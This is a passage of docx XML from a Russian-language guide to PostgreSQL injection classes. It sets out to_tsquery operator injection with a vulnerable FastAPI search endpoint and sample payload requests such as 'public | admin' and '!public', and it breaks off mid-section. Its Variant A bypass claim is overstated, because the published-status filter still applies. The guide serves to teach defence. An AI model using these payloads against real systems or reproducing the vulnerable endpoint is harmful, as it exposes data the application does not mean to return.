    <w:p w14:paraId="0055C717" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 Дополнительные приёмы валидации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — escape-helpers и trigram-index recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C3800A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6813F2CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Pattern Matching» / LIKE — https://www.postgresql.org/docs/current/functions-matching.html#FUNCTIONS-LIKE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60566B60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «pg_trgm» — https://www.postgresql.org/docs/current/pgtrgm.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6237F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   OWASP: «SQL Injection Prevention Cheat Sheet» (раздел «Special characters in LIKE») — https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4909BC65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Wiki: «Don't Do This» / «Misuse of LIKE» — https://wiki.postgresql.org/wiki/Don't_Do_This</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158D5B6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   SQLAlchemy Docs: «Operators» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>like_op</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://docs.sqlalchemy.org/en/20/core/operators.html#sqlalchemy.sql.expression.ColumnOperators.like</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF8BA7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   CWE-93: «Improper Neutralization of CRLF Sequences» (родственный класс — semantic injection) — https://cwe.mitre.org/data/definitions/93.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6317241A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.15.2 to_tsquery — операторы как boolean-override и syntax-error канал</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D0D96F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функция полнотекстового поиска PostgreSQL, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>парсит входной string как полный operator-язык</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Operators: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (AND), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (OR), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (NOT), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (FOLLOWED BY), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;N&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (FOLLOWED BY с distance N), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (prefix matching), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:LANG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (lexeme class), parens </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Когда приложение принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от пользователя и передаёт в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE search_vector @@ to_tsquery(:q)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через bind — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>operators парсятся</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и payload типа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin &amp; superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> меняет boolean-логику запроса. Дополнительно: syntax-invalid input </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: syntax error in tsquery: "..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>leaked input в text ошибки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — error-based channel для extraction (см. 3.15.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C321E97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CC413A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/articles.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEF14A7"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2DF8288E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243899EB"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2A75870B"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79CA6D16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C7D8C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED35661" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA5A127" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/articles/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09242DD0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search_articles(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFE3378" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", min_length=1),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72095131"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6A7CB365" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFB076D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Антипаттерн: to_tsquery с user-input через bind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5558C35A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494B3CF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, title, ts_rank(search_vector, to_tsquery('english', :q)) AS rank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666ED7CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4559A7EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE search_vector @@ to_tsquery('english', :q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8BB10C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          AND status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5913E88F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY rank DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD8F90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48096A71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4556E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(query, {"q": q})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B22C9CE"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00A4DC66" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bind-параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> корректно защищает от SQL-injection (no quote-escape возможен), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сама</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсит operators в значении.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA7F292" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — три варианта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7911A9BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант A — Boolean override (изменение match-логики):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AA0078" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сценарий: приложение использует FTS для поиска статей в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>published</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-статусе (через WHERE-clause). Но если индекс search_vector построен из title + body, и admin-статьи имеют title </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"admin: dashboard config"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, поиск </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q=public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> должен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> находить admin-статьи. Атакующий обходит фильтр через operator-override:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E0CDA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /articles/search?q=public%20%7C%20admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3DE273" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q = "public | admin"</w:t>
      </w:r>
      <w:r>
        <w:t>. Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D250F65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE search_vector @@ to_tsquery('english', 'public | admin')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CC89AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public OR admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — теперь матчит статьи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>либо с public, либо с admin</w:t>
      </w:r>
      <w:r>
        <w:t>. Атакующий читает admin-статьи через FTS-эндпоинт, который не должен их возвращать.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECAB8F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Более тонкий вариант — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:t>-operator для negation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5225E292" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /articles/search?q=!public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1271DFE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery('english', '!public')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → матчит статьи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>без слова public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — извлечение всего набора, кроме publicly-tagged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A71A66" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Вариант B — Prefix-extraction через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
